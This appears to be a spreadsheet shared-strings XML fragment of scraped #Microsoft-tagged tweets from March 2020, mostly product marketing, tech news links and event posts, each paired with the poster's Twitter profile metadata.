  <si>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08:33:09 +0000 2020</t>
  </si>
  <si>
    <t>At Microsoft #TechDays 2020? 
Stop by booth 3b41 to talk about #BestCrypt and #BCWipe with our reseller @MoonsoftOy!
#MSTechDays #Microsoft #MSTechDays2020 #TDFinland https://t.co/PlL09x90H2</t>
  </si>
  <si>
    <t>{'id': 708317015275126784, 'id_str': '708317015275126784', 'name': 'Jetico', 'screen_name': 'JeticoSoftware', 'location': 'Helsinki, Finland', 'description': 'Complete endpoint data protection #Encryption &amp; #DataErasure. BestCrypt &amp; BCWipe are trusted for National Security, Compliance and Personal Privacy.', 'url': 'https://t.co/WkIWUx0OUc', 'entities': {'url': {'urls': [{'url': 'https://t.co/WkIWUx0OUc', 'expanded_url': 'http://www.jetico.com', 'display_url': 'jetico.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 741, 'friends_count': 2603, 'listed_count': 50, 'created_at': 'Fri Mar 11 15:41:51 +0000 2016', 'favourites_count': 620, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1605,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'http://pbs.twimg.com/profile_images/973565972509593600/93fgZN6q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/973565972509593600/93fgZN6q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/708317015275126784/1520951220', 'profile_link_color': '00ADC6',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</si>
  <si>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08:30:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Goes All-In On #RPA (Robotic Process Automation)
https://t.co/AdfhzBGlns</t>
  </si>
  <si>
    <t>{'id': 36312734, 'id_str': '36312734', 'name': 'Stefan Pechardscheck', 'screen_name': 'pechardscheck', 'location': 'Berlin', 'description': 'Partner @BE_DACH - Passionate about Digitalization, Cybersecurity, Technology, IT strategy &amp; governance, running &amp; reading. Tweets = my opinion.', 'url': 'https://t.co/AZaMi62pUu', 'entities': {'url': {'urls': [{'url': 'https://t.co/AZaMi62pUu', 'expanded_url': 'http://www.bearingpoint.com', 'display_url': 'bearingpoint.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 588, 'friends_count': 324, 'listed_count': 450, 'created_at': 'Wed Apr 29 07:41:56 +0000 2009', 'favourites_count': 1007, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11460,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'http://pbs.twimg.com/profile_images/484308591910723584/icpo-IsD_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/484308591910723584/icpo-IsD_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36312734/1417614079',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</si>
  <si>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08:30:01 +0000 2020</t>
  </si>
  <si>
    <t>@Bitzi2 @IanBitterlin got a run on @SBSNews Australia 0800 UTC just now. Data centres must strive for REAL zero CO2 ASAP.  #NetZeroIsNOTzero. It's a delaying tactic of dirty energy incumbents. @amazon #Microsoft dirty clouds kill your customers.  How dumb is that! @SBSNews</t>
  </si>
  <si>
    <t>{'id': 2497851462, 'id_str': '2497851462', 'name': 'Michael Gunter', 'screen_name': 'voltscommissar', 'location': '.int', 'description': 'Advocating for overhaul of wholesale electricity pricing in NEM to avert unwarranted price gouging by fewer coal generators. #OffGrid #SolarHotWater #negawatts', 'url': 'https://t.co/xMkw7bRitn', 'entities': {'url': {'urls': [{'url': 'https://t.co/xMkw7bRitn', 'expanded_url': 'http://voltscommissar.net', 'display_url': 'voltscommissar.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 296, 'friends_count': 559, 'listed_count': 12, 'created_at': 'Fri May 16 06:22:20 +0000 2014', 'favourites_count': 6385, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7480,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'http://pbs.twimg.com/profile_images/878097792102653952/eec558YN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/878097792102653952/eec558YN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2497851462/1479359101',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</si>
  <si>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08:29:18 +0000 2020</t>
  </si>
  <si>
    <t>From day one, Microsoft Dynamics 365 Business Central makes managing financials, sales, service and operations easier and faster. 
#DynamicsBusinessSolutions #Microsoft #MicrosoftDynamic365 #MicrosoftDynamics #Dynamics365 #UAE #Dubai #AbuDhabi
https://t.co/Uwh5LXuGDN https://t.co/Ao2qnmZ675</t>
  </si>
  <si>
    <t>{'id': 1176110801440014336, 'id_str': '1176110801440014336', 'name': 'Dynamics Business Solutions', 'screen_name': 'DynamicsBusine2', 'location': 'Dubai, UAE', 'description': 'Dynamics Business Solutions (DBS) is a preferred Microsoft Dynamics partner in UAE, We have been assisting UAE small and medium enterprises.', 'url': 'https://t.co/l0l47ftpfh', 'entities': {'url': {'urls': [{'url': 'https://t.co/l0l47ftpfh', 'expanded_url': 'http://www.dynamics.ae', 'display_url': 'dynamics.ae', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Sep 23 12:28:04 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 76, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176111219121344512/MQEvvG3F_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176111219121344512/MQEvvG3F_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1176110801440014336/1569243640',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</si>
  <si>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08:29:02 +0000 2020</t>
  </si>
  <si>
    <t>Why should you replace your #Microsoft CA with GlobalSign #SaaS #CA? GlobalSign manages the #security, high availability and CA operations, ensuring you meet SLAs and compliance audits. Learn how we can help you by visiting the link attached. https://t.co/Zi7nR8iY8Q https://t.co/cPtNnxci59</t>
  </si>
  <si>
    <t>{'id': 707936239568166913, 'id_str': '707936239568166913', 'name': 'James Coleman', 'screen_name': 'james_SSL', 'location': 'Maidstone, England', 'description': 'EMEA Sales Manager at GMO GlobalSign, supplying partners with all their digital certificate needs and beyond #ssl #iot #smime #whdglobal', 'url': 'https://t.co/RB0ngMJJsY', 'entities': {'url': {'urls': [{'url': 'https://t.co/RB0ngMJJsY', 'expanded_url': 'http://www.globalsign.co.uk', 'display_url': 'globalsign.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 642, 'friends_count': 624, 'listed_count': 105, 'created_at': 'Thu Mar 10 14:28:47 +0000 2016', 'favourites_count': 217, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3465,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'http://pbs.twimg.com/profile_images/707938950506278912/Ydt_b7ua_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/707938950506278912/Ydt_b7ua_normal.jpg',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</si>
  <si>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08:28:09 +0000 2020</t>
  </si>
  <si>
    <t>Public #blockchain to be made #enterprise ready..
#Microsoft #Ethereum 
Pumping some life into a dead corpse
or a stroke of genius?
@efipm @UrsBolt @embeddedfinance @Xbond49 @leimer @Rahul_J_Mathur
https://t.co/AZ6Y1vb5eV</t>
  </si>
  <si>
    <t>{'id': 28080256, 'id_str': '28080256', 'name': 'Arunkumar Krishnakumar', 'screen_name': 'Karunk', 'location': 'London, UK', 'description': '#VC @GreenShoresCap | #Deeptech #Diversity | #Fintech #Influencer | #Oxford #LSE Alum | #ClimateChange #Innovation #Sustainability #SDGs #Investments |', 'url': 'https://t.co/QJYr7X0IMs', 'entities': {'url': {'urls': [{'url': 'https://t.co/QJYr7X0IMs', 'expanded_url': 'https://www.linkedin.com/in/arunkumarkrishnakumar', 'display_url': 'linkedin.com/in/arunkumarkrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8697, 'friends_count': 7579, 'listed_count': 220, 'created_at': 'Wed Apr 01 09:55:48 +0000 2009', 'favourites_count': 5554, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5255,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'http://pbs.twimg.com/profile_images/1155916996111994880/5Pn_w679_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1155916996111994880/5Pn_w679_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28080256/1576348692',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</si>
  <si>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08:26:33 +0000 2020</t>
  </si>
  <si>
    <t>TIL the middle mouse button will close documents in Visual Studio 2019 
#dotnetcore #microsoft #visualstudio #angular https://t.co/1IpyLeXyMh</t>
  </si>
  <si>
    <t>{'id': 176385195, 'id_str': '176385195', 'name': 'Eamon Keane', 'screen_name': 'eamokeane', 'location': 'Galway, Ireland', 'description': 'ðŸ“ Galway, Ireland ðŸ‡®ðŸ‡ª\nðŸ’» Full Stack Software Developer\nðŸ‘ Part time farmer \nðŸ‹ï¸ â¬…Enjoy this also', 'url': 'https://t.co/jdov4MxEux', 'entities': {'url': {'urls': [{'url': 'https://t.co/jdov4MxEux', 'expanded_url': 'http://eamonkeane.dev', 'display_url': 'eamonkeane.dev', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 207, 'friends_count': 320, 'listed_count': 3, 'created_at': 'Mon Aug 09 11:43:41 +0000 2010', 'favourites_count': 1657, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 417, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FE9926', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/909752357604528130/6V_aP4J8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/909752357604528130/6V_aP4J8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/176385195/1582234924', 'profile_link_color': '19CF86',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</si>
  <si>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08:26:13 +0000 2020</t>
  </si>
  <si>
    <t>Check out MICROSOFT WINDOWS 98 2ND EDITION FULL OPERATING SYSTEM WIN 98 NEW #Microsoft https://t.co/W9f0Mf0kde via @eBay</t>
  </si>
  <si>
    <t>Thu Mar 05 08:23:13 +0000 2020</t>
  </si>
  <si>
    <t>MSFTMechanics: Microsoft Endpoint Manager: Bringing together #SCCM and #Intune capabilities. Click link to watch: https://t.co/UaIxY9N7kc #Microsoft #Windows10 #Office365 #ConfigMgr #MECM https://t.co/w19ObBgh2o</t>
  </si>
  <si>
    <t>{'id': 34574639, 'id_str': '34574639', 'name': 'Mark S Hurst', 'screen_name': 'Scoundrel666', 'location': 'London, England', 'description': 'Technology evangelist, solution architect and owner/MD of HTL. Designing a better tomorrow for today.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 836, 'listed_count': 256, 'created_at': 'Thu Apr 23 09:34:51 +0000 2009', 'favourites_count': 465, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 55093, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '022330', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/522984348/Scoundrel_09-2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/522984348/Scoundrel_09-2_normal.jpg',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</si>
  <si>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08:21:02 +0000 2020</t>
  </si>
  <si>
    <t>New solo video on my site today #Mesquite   #microsoft #recipe https://t.co/olz8jQLzFL</t>
  </si>
  <si>
    <t>{'id': 1235283689531203585, 'id_str': '1235283689531203585', 'name': 'Melanie White', 'screen_name': 'xcalakgranis', 'location': 'Pueblo, USA', 'description': 'My night has become a sunny dawn because of you', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Wed Mar 04 19:19:22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'http://pbs.twimg.com/profile_images/1235315317582303237/0XBAXAo0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235315317582303237/0XBAXAo0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235283689531203585/1583357128',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</si>
  <si>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08:15:20 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 08:15:00 +0000 2020</t>
  </si>
  <si>
    <t>Today, Barbara Hallmans is kicking off the next #HPE #Microsoft #Hybridcloud Summit in Lisbon. Access the slidedeck at  https://t.co/JuaCQWWvUF
#AzureArc #AzureStackHub #AzureStackHCI @PTMicrosoft @luis_silva_in @mamajoamato @TatianaOspina_T #womenintech @p3dromorais @AcrmSilva https://t.co/BIZb1bs7gG</t>
  </si>
  <si>
    <t>Thu Mar 05 08:14:31 +0000 2020</t>
  </si>
  <si>
    <t>Start of the actual presentation 
#powerbi #microsoft #meetup https://t.co/cerZYpes4E</t>
  </si>
  <si>
    <t>{'id': 1161758364902162433, 'id_str': '1161758364902162433', 'name': 'Sarath Boppudi', 'screen_name': 'BoppudiSarath', 'location': 'Brisbane', 'description': 'I am a solutions-focused and certified technology leader with a stellar record of success in design, manage and describe complex business solutions', 'url': 'https://t.co/q01iwBtNWC', 'entities': {'url': {'urls': [{'url': 'https://t.co/q01iwBtNWC', 'expanded_url': 'http://sarathboppudi.com', 'display_url': 'sarathboppudi.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Wed Aug 14 21:55:53 +0000 2019', 'favourites_count': 4,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'http://pbs.twimg.com/profile_images/1161758551171198976/lBFLu6rB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161758551171198976/lBFLu6rB_normal.jpg',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</si>
  <si>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08:11:06 +0000 2020</t>
  </si>
  <si>
    <t>Secure and seamless business continuity is possible! Nakilat improved efficiency and cut operating costs in half with #Microsoft SaaS solutions. Contact Qaixen to learn how you can too. https://t.co/smvCPa3NG2</t>
  </si>
  <si>
    <t>Thu Mar 05 08:10:36 +0000 2020</t>
  </si>
  <si>
    <t>My friend gave me a pen because they know I do art... but its a surface pen aaand I just use either my iPad &amp;amp; apple pen or drawing tablet  #Microsoft #surfacepro #art #artist https://t.co/pKlUcbIbK9</t>
  </si>
  <si>
    <t>{'id': 1055338705890623488, 'id_str': '1055338705890623488', 'name': 'Jelly Boy', 'screen_name': 'GoodAE1', 'location': 'California, USA', 'description': 'Call me Jelly!!! AQW - Good This is my ART &amp; GAMING Account!!! 19 YO He/Him Cis Male ðŸ’•Gay ðŸ³ï¸\u200dðŸŒˆ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 181, 'friends_count': 733, 'listed_count': 2, 'created_at': 'Thu Oct 25 06:02:09 +0000 2018', 'favourites_count': 2762, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 846, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1137202667162202112/4eMm8lu6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1137202667162202112/4eMm8lu6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1055338705890623488/1543044450',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</si>
  <si>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08:09:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces #PowerShell 7, the latest major update to PowerShell   https://t.co/gRZNWSabkT by @pradeepviswav</t>
  </si>
  <si>
    <t>Thu Mar 05 08:07:32 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft An error occurred while processing your request.
Reference #97.34f57468.1583395390.2b2080e4</t>
  </si>
  <si>
    <t>Thu Mar 05 08:05:41 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #EY And #ConsenSys To Make The Public #Ethereum #Blockchain Safe For #Enterprises https://t.co/QNtaforwLI @Forbes @ForbesTech @ForbesCrypto @ForbesEurope @Microsoft @MSFTBusinessUK @EYnews @Consensys @ethereum @VitalikButerin #ETH #Crypto #TechNews #Technology</t>
  </si>
  <si>
    <t>{'id': 3064950609, 'id_str': '3064950609', 'name': 'Cassiopeia Services', 'screen_name': 'Cassiopeia_ltd', 'location': 'London', 'description': 'Boutique PR-IR firm. Official PR @DigiByteCoin. Awarded Best International Investor Relations Firm 2018 @AwardsADVFN | @uniwestminster #DistinctivenessAward SME', 'url': 'https://t.co/S6sY0JibNp', 'entities': {'url': {'urls': [{'url': 'https://t.co/S6sY0JibNp', 'expanded_url': 'http://cassiopeia-ltd.com/', 'display_url': 'cassiopeia-ltd.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 985, 'friends_count': 637, 'listed_count': 59, 'created_at': 'Sat Feb 28 22:20:46 +0000 2015', 'favourites_count': 1629, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6507,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'http://pbs.twimg.com/profile_images/1022825130626637824/ObeyjPme_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1022825130626637824/ObeyjPme_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3064950609/1541599826',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</si>
  <si>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08:04:08 +0000 2020</t>
  </si>
  <si>
    <t>Oracle staffers in Europe weather cloudy job cuts: As many as 1,300 workers face chop after sales slide https://t.co/IRfyUEzZlC via @Hybrid_Circle #vmWARE #Microsoft https://t.co/ZS6UdAOJPY</t>
  </si>
  <si>
    <t>Thu Mar 05 08:03:37 +0000 2020</t>
  </si>
  <si>
    <t>EY, #Microsoft and ConsenSys Launch Enterprise Platform on #Ethereum Mainnet
https://t.co/5iPAHGZywI
https://t.co/fArq19HXoS</t>
  </si>
  <si>
    <t>Thu Mar 05 08:02:44 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft encourages Seattle area and Bay Area employees to work from home if possible through March 25th, asks sick employees to stay home https://t.co/zIBreh7DDq</t>
  </si>
  <si>
    <t>Thu Mar 05 08:01:38 +0000 2020</t>
  </si>
  <si>
    <t>News from #PowerShell
#PowerShell #Sysadmin #Microsoft
 Announcing PowerShell 7.0 https://t.co/7ducD4OLbi</t>
  </si>
  <si>
    <t>Thu Mar 05 08:01:35 +0000 2020</t>
  </si>
  <si>
    <t>I dont think I can ever get tired of having sex with you. 
 #deepstate #microsoft https://t.co/agvZdKX8O7</t>
  </si>
  <si>
    <t>{'id': 1235257673991544832, 'id_str': '1235257673991544832', 'name': 'Katrina Rogers', 'screen_name': 'steelammafe', 'location': 'Jackson, USA', 'description': 'Every time I see you, I fall in love all over again.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Wed Mar 04 17:36:00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'http://pbs.twimg.com/profile_images/1235262715221942273/UUTQNjs1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235262715221942273/UUTQNjs1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235257673991544832/1583344675',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</si>
  <si>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08:01:28 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams: What's New Feb 2020 #teams #microsoftteams #microsoft #office365 https://t.co/GpxyPeWSc8 https://t.co/1ACZDeJroD</t>
  </si>
  <si>
    <t>Thu Mar 05 08:01:03 +0000 2020</t>
  </si>
  <si>
    <t>Attending the meetup on Power BI in Brisbane. Topic is devops with Power BI
It is a great topic. Thanks to Microsoft for the presentation
#microsoft #powerbi #meetup https://t.co/enpUWVRNg7</t>
  </si>
  <si>
    <t>Thu Mar 05 08:00:33 +0000 2020</t>
  </si>
  <si>
    <t>Calling the new Presence endpoint in MS graph API from SPFx. Written by our MVP @luismanez
https://t.co/x4DbI6tTAP https://t.co/x4DbI6tTAP
#Microsoft #Endpoint #API #SPFx</t>
  </si>
  <si>
    <t>{'id': 19995747, 'id_str': '19995747', 'name': 'ClearPeople', 'screen_name': 'ClearPeople', 'location': 'London', 'description': 'Atlas is our next generation digital workspace for communication, knowledge and collaboration beautifully brought together in one place.', 'url': 'http://t.co/XVRsCl9gPh', 'entities': {'url': {'urls': [{'url': 'http://t.co/XVRsCl9gPh', 'expanded_url': 'http://www.clearpeople.com', 'display_url': 'clearpeople.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 727, 'friends_count': 551, 'listed_count': 107, 'created_at': 'Tue Feb 03 19:27:43 +0000 2009', 'favourites_count': 516, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3145, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EEEEEE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218203789020344326/RWUrNbBr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218203789020344326/RWUrNbBr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19995747/1580833044', 'profile_link_color': '5AD839', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '4D4D4D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 08:00:22 +0000 2020</t>
  </si>
  <si>
    <t>Is your #Azure environment secure?
We have #Microsoft #MVP and Regional Director @maarten_goet at #AzureFest with a session on #AzureSentinel
He has lots of demos prepared to show you how to properly secure your #cloud environment!
Check out his session on the 28th of May! https://t.co/4R6p6b1it5</t>
  </si>
  <si>
    <t>{'id': 1087633863239700480, 'id_str': '1087633863239700480', 'name': 'AzureFestNL', 'screen_name': 'AzureFestNL', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 189, 'friends_count': 1, 'listed_count': 1, 'created_at': 'Tue Jan 22 08:51:35 +0000 2019', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 46, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1119177596103790592/iSymt4Sl_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1119177596103790592/iSymt4Sl_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1087633863239700480/1554718240',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</si>
  <si>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08:00:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft releases all-in-one Office app for Android https://t.co/VQWCqkvGLy @TechSpot #Android https://t.co/uw6N6HM8b8</t>
  </si>
  <si>
    <t>{'id': 462793519, 'id_str': '462793519', 'name': 'Bimotech Solutions', 'screen_name': 'BimotechLtd', 'location': 'Bristol, United Kingdom', 'description': "Bimotech offers a one stop shop for all your business IT requirements. Including telephony, emails, website design, servers, PC's and lots more!\n#keepITsimple", 'url': 'http://t.co/UpOCXb3IIN', 'entities': {'url': {'urls': [{'url': 'http://t.co/UpOCXb3IIN', 'expanded_url': 'http://www.bimotech.co.uk', 'display_url': 'bimotech.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1157, 'friends_count': 945, 'listed_count': 164, 'created_at': 'Fri Jan 13 11:03:12 +0000 2012', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3620, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E1BB8E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/877507778755133440/JrU_-jNj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/877507778755133440/JrU_-jNj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/462793519/1508421550',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</si>
  <si>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08:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Magma Fincorp modernizes #CRM , triples #sales leads with #Microsoft #Dynamics 365 - #India Nisha Menon https://t.co/RXcrGd0UaI #MSFTAdvocate</t>
  </si>
  <si>
    <t>Thu Mar 05 07:58:32 +0000 2020</t>
  </si>
  <si>
    <t>We're at the BusinessTech Digital Banking conference speaking all things Jamf! 
Banks are using Jamf to bring two ecosystems together Apple and Microsoft giving employees the choice to choose the best device! 
 #jamf  #apple #mdm #microsoft #enterprise #bankingtech https://t.co/X7xwGFbMuW</t>
  </si>
  <si>
    <t>Thu Mar 05 07:57:47 +0000 2020</t>
  </si>
  <si>
    <t>.@DacSystems leads the way with .@MicrosoftSA 
By providing decision-makers with access to knowledgeable analysts, DAC becomes an invaluable ally as organisations embark on their digital transformation journey.
Read More:  https://t.co/g1ISfFm8qh
#microsoft #D365 #Dynamics https://t.co/IoCKhR3P7H</t>
  </si>
  <si>
    <t>{'id': 344200293, 'id_str': '344200293', 'name': 'DAC Systems', 'screen_name': 'DacSystems', 'location': 'South Africa', 'description': '', 'url': 'http://t.co/yt8vBGtokZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/yt8vBGtokZ', 'expanded_url': 'http://www.dac.co.za', 'display_url': 'dac.co.za', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 253, 'friends_count': 432, 'listed_count': 51, 'created_at': 'Thu Jul 28 17:56:07 +0000 2011', 'favourites_count': 169, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4028, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDECE9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/755341248110661632/ZxE5nRT0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/755341248110661632/ZxE5nRT0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/344200293/1570594792', 'profile_link_color': '088253', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E3E2DE', 'profile_text_color': '634047', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 07:55:55 +0000 2020</t>
  </si>
  <si>
    <t>"...some of the largest players in the #blockchain space like #Microsoft, #EY and #ConsenSys are taking on the public #Ethereum #blockchain with their initiative called #BaselineProtocol..." @ConsenSys, @EYnews, @microsoft, by @biserdimitrov in @forbes
https://t.co/IUVaejV84o</t>
  </si>
  <si>
    <t>{'id': 1052224954991828992, 'id_str': '1052224954991828992', 'name': 'ConsenSys News', 'screen_name': 'ConsensysNews', 'location': 'Brooklyn, NY', 'description': 'The press office of @ConsenSys. Follow for releases and our favorite stories from around the world. DMs open to members of the media.', 'url': 'https://t.co/duacrhTWK6', 'entities': {'url': {'urls': [{'url': 'https://t.co/duacrhTWK6', 'expanded_url': 'https://consensys.net/press-releases/', 'display_url': 'consensys.net/press-releases/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1229, 'friends_count': 1556, 'listed_count': 23, 'created_at': 'Tue Oct 16 15:49:13 +0000 2018', 'favourites_count': 894, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 490, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1052350897307770880/CWTjYPrt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052350897307770880/CWTjYPrt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1052224954991828992/1575386147',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</si>
  <si>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07:55:16 +0000 2020</t>
  </si>
  <si>
    <t>@AppleSupport @Apple dudes ffs please fix iCloud for Windows keep asking for credentials. It a fucking pain in the ass. Windows 10 Pro and MS Office 2013 original bought versions. Disabled office plug-ins and email and still doing the same. #Apple #microsoft #icloud #USA #EUROPE</t>
  </si>
  <si>
